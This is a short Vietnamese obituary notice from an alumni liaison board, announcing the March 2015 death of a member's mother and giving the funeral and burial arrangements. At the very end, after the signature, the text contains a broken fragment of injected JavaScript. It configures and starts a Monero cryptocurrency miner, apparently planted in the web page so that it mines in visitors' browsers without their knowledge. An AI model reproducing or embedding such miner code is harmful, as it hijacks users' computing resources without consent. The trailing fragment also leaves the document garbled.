TIN BUỒN

TIN BUỒN
Được tin Cụ Bà Hà Thị Nội, Thân Mẫu anh Phạm Đình Long, khóa 15 Nông Lâm Súc Bảo Lộc, đã từ trần vào lúc 12:30 giờ ngày chủ nhật 8/3/2015, tại nhà số 18, lô F2, Chung cư Nguyễn Thiện Thuật, Quận 3, TP Hồ Chí Minh, hưởng thọ 91 tuổi.

Lễ động quan vào lúc 7 giờ ngày thứ Tư, 11/3/2015 và linh cữu sẽ được an táng tại Nghĩa Trang Thành Phố 2, Củ Chi.

Ban Liên Lạc NLS ĐT- BT  xin thành kính phân ưu với gia quyến Cụ Bà cùng anh chị Phạm Đình Long và nguyện cầu hương linh Cụ Bà sớm được siêu thoát về cõi vĩnh hằng.
      BLL NLS ĐT - BT

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();